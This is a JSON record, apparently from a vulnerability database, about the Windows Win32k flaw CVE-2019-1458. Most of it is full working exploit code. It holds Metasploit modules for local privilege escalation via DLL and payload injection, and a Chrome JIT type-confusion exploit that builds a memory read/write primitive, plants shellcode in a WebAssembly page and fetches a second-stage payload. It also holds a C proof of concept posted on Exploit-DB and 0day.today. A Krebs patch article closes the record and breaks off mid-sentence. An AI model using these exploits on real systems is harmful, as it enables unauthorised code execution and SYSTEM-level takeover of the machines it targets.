&& (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511 \nreturn CheckCode::Appears \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607 \nreturn CheckCode::Appears \nelse \nreturn CheckCode::Safe \nend \nend \n \ndef exploit \nsuper \n \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] != ARCH_X64 \nfail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported') \nend \n \nprocess = setup_process \nlibrary_data = exploit_data('CVE-2019-1458', 'exploit.dll') \nprint_status(\"Injecting exploit into #{process.pid} ...\") \nexploit_mem, offset = inject_dll_data_into_process(process, library_data) \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \nencoded_payload = payload.encoded \npayload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159569/cve_2019_1458_wizardopium.rb.txt"}], "exploitdb": [{"lastseen": "2020-03-09T21:37:40", "description": "", "published": "2020-03-03T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - &#039;WizardOpium&#039; Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-03T00:00:00", "id": "EDB-ID:48180", "href": "https://www.exploit-db.com/exploits/48180", "sourceData": "#include <cstdio>\r\n#include <windows.h>\r\n\r\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\r\n\r\nint main() { \r\n HINSTANCE hInstance = GetModuleHandle(NULL);\r\n\r\n WNDCLASSEX wcx;\r\n ZeroMemory(&wcx, sizeof(wcx));\r\n wcx.hInstance = hInstance;\r\n wcx.cbSize = sizeof(wcx);\r\n wcx.lpszClassName = L\"SploitWnd\";\r\n wcx.lpfnWndProc = DefWindowProc;\r\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\r\n \r\n printf(\"[*] Registering window\\n\");\r\n ATOM wndAtom = RegisterClassEx(&wcx);\r\n if (wndAtom == INVALID_ATOM) {\r\n printf(\"[-] Failed registering SploitWnd window class\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Creating instance of this window\\n\");\r\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n if (sploitWnd == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to create SploitWnd window\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\r\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\r\n\r\n printf(\"[*] Allocate memory to be used for corruption\\n\");\r\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n printf(\"\\tptr: %p\\n\", mem);\r\n PBYTE byteView = (PBYTE)mem;\r\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\r\n\r\n //pass DrawSwitchWndHilite double dereference\r\n PVOID* ulongView = (PVOID*)mem;\r\n ulongView[0x20 / sizeof(PVOID)] = mem;\r\n\r\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\r\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\r\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\r\n\r\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\r\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n\r\n printf(\"[*] Simulating alt key press\\n\");\r\n BYTE keyState[256];\r\n GetKeyboardState(keyState);\r\n keyState[VK_MENU] |= 0x80;\r\n SetKeyboardState(keyState);\r\n\r\n printf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\");\r\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\r\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48180"}], "metasploit": [{"lastseen": "2021-02-25T18:37:04", "description": "This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The payload is executed within the rwx region of the sandboxed renderer process. This module can target the renderer process (target 0), but Google Chrome must be launched with the --no-sandbox flag for the payload to execute successfully. Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once. Additionally the exploit can cause the target machine to restart when the session is terminated. A BSOD is also likely to occur when the system is shut down or rebooted.\n", "published": "2020-02-14T22:10:52", "type": "metasploit", "title": "Google Chrome 67, 68 and 69 Object.create exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2021-02-25T14:13:40", "id": "MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n include Msf::Payload::Windows::AddrLoader_x64\n include Msf::Payload::Windows::ReflectiveDllInject_x64\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process.\n This module can target the renderer process (target 0), but Google\n Chrome must be launched with the --no-sandbox flag for the payload to\n execute successfully.\n Alternatively, this module can use CVE-2019-1458 to escape the renderer\n sandbox (target 1). This will only work on vulnerable versions of\n Windows (e.g Windows 7) and the exploit can only be triggered once.\n Additionally the exploit can cause the target machine to restart\n when the session is terminated. A BSOD is also likely to occur when\n the system is shut down or rebooted.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx', 'linux'],\n 'DefaultTarget' => 0,\n 'Targets' => [\n [\n 'No sandbox escape (--no-sandbox)', {}\n ],\n [\n 'Windows 7 (x64) sandbox escape via CVE-2019-1458',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'DefaultOptions' => { 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' }\n }\n ],\n ],\n 'DisclosureDate' => '2018-09-25'\n )\n )\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information during exploitation', false]),\n ])\n deregister_options('DLL')\n end\n\n def library_path\n File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll')\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] #{request.body}\")\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n download_payload = ''\n shellcode = payload.encoded\n uripath = datastore['URIPATH'] || get_resource\n uripath += '/' unless uripath.end_with? '/'\n\n if target.name.end_with?('CVE-2019-1458')\n if request.uri.to_s.end_with?('/payload')\n loader_data = stage_payload\n pidx = loader_data.index('PAYLOAD:')\n if pidx\n loader_data[pidx, payload.encoded.length] = payload.encoded\n end\n loader_data += \"\\0\" * (0x20000 - loader_data.length)\n send_response(cli, loader_data, {\n 'Content-Type' => 'application/octet-stream',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n print_good(\"Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)\")\n end\n loader = generate_loader\n shellcode = loader[0]\n shellcode_addr_offset = loader[1]\n shellcode_size_offset = loader[2]\n download_payload = <<-JS\n var req = new XMLHttpRequest();\n req.open('GET', '#{uripath}payload', false);\n req.overrideMimeType('text/plain; charset=x-user-defined');\n req.send(null);\n if (req.status != 200) {\n return;\n }\n let payload_size = req.responseText.length;\n let payload_array = new ArrayBuffer(payload_size);\n let payload8 = new Uint8Array(payload_array);\n for (let i = 0; i < req.responseText.length; i++) {\n payload8[i] = req.responseText.charCodeAt(i) & 0xff;\n }\n let payload_array_mem_addr = memory.addrof(payload_array) + 0x20n;\n let payload_array_addr = memory.readPtr(payload_array_mem_addr);\n print('payload addr: 0x' + payload_array_addr.toString(16));\n uint64View[0] = payload_array_addr;\n for (let i = 0; i < 8; i++) {\n shellcode[#{shellcode_addr_offset} + i] = uint8View[i];\n }\n for (let i = 0; i < 4; i++) {\n shellcode[#{shellcode_size_offset} + i] = (payload_size>>(8*i)) & 0xff;\n }\n for (let i = 4; i < 8; i++) {\n shellcode[#{shellcode_size_offset} + i] = 0;\n }\n JS\n end\n\n jscript = <<~JS\n let ab = new ArrayBuffer(8);\n let floatView = new Float64Array(ab);\n let uint64View = new BigUint64Array(ab);\n let uint8View = new Uint8Array(ab);\n\n let shellcode = new Uint8Array([#{Rex::Text.to_num(shellcode)}]);\n\n Number.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n };\n\n BigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n };\n\n function hex(n) {\n return '0x' + n.toString(16);\n };\n\n function fail(s) {\n print('FAIL ' + s);\n throw null;\n }\n\n const NUM_PROPERTIES = 32;\n const MAX_ITERATIONS = 100000;\n\n function gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n }\n\n function make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n }\n\n function pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n #{download_payload}\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(el_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n }\n\n pwn();\n JS\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = <<~JS\n print = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n };\n JS\n\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(%r{//.*$}, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %(\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n)\n send_response(cli, html, {\n 'Content-Type' => 'text/html',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n end\n\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_object_create.rb"}, {"lastseen": "2021-02-26T20:28:31", "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitalized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated.\n", "published": "2020-10-15T15:59:44", "type": "metasploit", "title": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2019_1458_WIZARDOPIUM/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',\n 'Description' => %q{\n This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'piotrflorczyk', # poc\n 'unamer', # exploit\n 'timwr', # msf module\n ],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows 7 x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS ],\n 'Reliability' => [ UNRELIABLE_SESSION ]\n },\n 'References' =>\n [\n ['CVE', '2019-1458'],\n ['URL', 'https://github.com/unamer/CVE-2019-1458'],\n ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],\n ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],\n ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']\n ],\n 'DisclosureDate' => '2019-12-10',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'WizardOpium' ]\n )\n )\n register_options([\n OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])\n ])\n end\n\n def setup_process\n process_name = datastore['PROCESS']\n begin\n print_status(\"Launching #{process_name} to host the exploit...\")\n launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)\n process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe\n end\n\n file_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys')\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n build_num_gemversion = Rex::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\")\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/\n if (build_num_gemversion >= Rex::Version.new('6.0.6000.0')) && (build_num_gemversion < Rex::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) && (build_num_gemversion < Rex::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) && (build_num_gemversion < Rex::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) && (build_num_gemversion < Rex::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) && (build_num_gemversion < Rex::Version.new('10.0.10240.18427')) # Windows 10 v1507\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) && (build_num_gemversion < Rex::Version.new('10.0.10586.99999')) # Windows 10 v1511\n return CheckCode::Appears\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) && (build_num_gemversion < Rex::Version.new('10.0.14393.3383')) # Windows 10 v1607\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] != ARCH_X64\n fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')\n end\n\n process = setup_process\n library_data = exploit_data('CVE-2019-1458', 'exploit.dll')\n print_status(\"Injecting exploit into #{process.pid} ...\")\n exploit_mem, offset = inject_dll_data_into_process(process, library_data)\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n encoded_payload = payload.encoded\n payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2019_1458_wizardopium.rb"}], "zdt": [{"lastseen": "2020-03-09T21:06:08", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2020-03-09T00:00:00", "title": "Microsoft Windows - (WizardOpium) Local Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-03-09T00:00:00", "id": "1337DAY-ID-34066", "href": "https://0day.today/exploit/description/34066", "sourceData": "#include <cstdio>\r\n#include <windows.h>\r\n\r\nextern \"C\" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);\r\n\r\nint main() { \r\n HINSTANCE hInstance = GetModuleHandle(NULL);\r\n\r\n WNDCLASSEX wcx;\r\n ZeroMemory(&wcx, sizeof(wcx));\r\n wcx.hInstance = hInstance;\r\n wcx.cbSize = sizeof(wcx);\r\n wcx.lpszClassName = L\"SploitWnd\";\r\n wcx.lpfnWndProc = DefWindowProc;\r\n wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0\r\n \r\n printf(\"[*] Registering window\\n\");\r\n ATOM wndAtom = RegisterClassEx(&wcx);\r\n if (wndAtom == INVALID_ATOM) {\r\n printf(\"[-] Failed registering SploitWnd window class\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Creating instance of this window\\n\");\r\n HWND sploitWnd = CreateWindowEx(0, L\"SploitWnd\", L\"\", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n if (sploitWnd == INVALID_HANDLE_VALUE) {\r\n printf(\"[-] Failed to create SploitWnd window\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\\n\");\r\n NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);\r\n\r\n printf(\"[*] Allocate memory to be used for corruption\\n\");\r\n PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n printf(\"\\tptr: %p\\n\", mem);\r\n PBYTE byteView = (PBYTE)mem;\r\n byteView[0x6c] = 1; // use GetKeyState in xxxPaintSwitchWindow\r\n\r\n //pass DrawSwitchWndHilite double dereference\r\n PVOID* ulongView = (PVOID*)mem;\r\n ulongView[0x20 / sizeof(PVOID)] = mem;\r\n\r\n printf(\"[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\\n\");\r\n SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);\r\n printf(\"[*] GetLastError = %x\\n\", GetLastError());\r\n\r\n printf(\"[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\\n\");\r\n HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L\"\", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);\r\n\r\n printf(\"[*] Simulating alt key press\\n\");\r\n BYTE keyState[256];\r\n GetKeyboardState(keyState);\r\n keyState[VK_MENU] |= 0x80;\r\n SetKeyboardState(keyState);\r\n\r\n printf(\"[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time\");\r\n NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);\r\n}\n\n# 0day.today [2020-03-09] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34066"}], "krebs": [{"lastseen": "2019-12-14T23:20:57", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0859", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-1489"], "description": "**Microsoft** today released updates to plug three dozen security holes in its **Windows** operating system and other software. The patches include fixes for seven critical bugs \u2014 those that can be exploited by malware or miscreants to take control over a Windows system with no help from users -- as well as another flaw in most versions of Windows that is already being exploited in active attacks.\n\nBy nearly all accounts, the chief bugaboo this month is [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>), a vulnerability in a core Windows component (Win32k) that is present in Windows 7 through 10 and Windows Server 2008-2019. This bug is already being exploited in the wild, and according to **Recorded Future** the exploit available for it is similar to [CVE-2019-0859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0859>), a Windows flaw reported in April that was found [being sold in underground markets](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>).\n\nCVE-2019-1458 is what's known as a \"privilege escalation\" flaw, meaning an attacker would need to previously have compromised the system using another vulnerability. Handy in that respect is [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>), a similarly widespread critical issue in the Windows font library that could be exploited just by getting the user to visit a hacked or malicious Web site.\n\n**Chris Goettl**, director of security at [Ivanti](<https://www.ivanti.com/resources/patch-tuesday>), called attention to a curious patch advisory Microsoft released today for [CVE-2019-1489](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1489>), which is yet another weakness in the **Windows Remote Desktop Protocol** (RDP) client, a component of Windows that lets users view and manage their system from a remote computer. What's curious about this advisory is that it applies only to **Windows XP Service Pack 3**, which is no longer receiving security updates.\n\n\"The Exploitability Assessment for Latest Software Release and Older Software Release is 0, which is usually the value reserved for a vulnerability that is known to be exploited, yet the Exploited value was currently set to 'No' as the bulletin was released today,\" Goettl said. \"If you look at the Zero Day from this month ([CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>)) the EA for Older Software Release is '0 - Exploitation Detected.' An odd discrepancy on top of a CVE advisory for an outdated OS. It is very likely this is being exploited in the wild.\"\n\nMicrosoft didn't release a patch for this bug on XP, and [its advisory on it](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1489>) is about as sparse as they come. But if you're still depending on Windows XP for remote access, you likely have bigger security concerns. Microsoft has patched [many critical RDP flaws](<https://krebsonsecurity.com/?s=rdp+2019+microsoft+patch&x=0&y=0>) in the past year. Even [the FBI last year encouraged users to disable it](<https://blog.netop.com/fbi-recommends-rdp-alternative>) unless needed, citing flawed encryption mechanisms in older versions and a lack of access 